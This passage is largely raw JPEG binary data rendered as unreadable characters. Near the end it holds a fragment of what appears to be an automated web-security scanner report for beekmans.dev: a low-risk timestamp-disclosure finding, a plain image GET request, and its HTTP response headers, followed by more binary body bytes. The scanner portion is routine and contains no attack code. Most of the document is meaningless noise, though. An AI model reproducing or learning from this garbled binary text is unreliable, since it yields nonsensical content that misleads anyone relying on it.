¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          193438474
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        41. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          195689250, which evaluates to: 1976-03-14 23:07:30

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
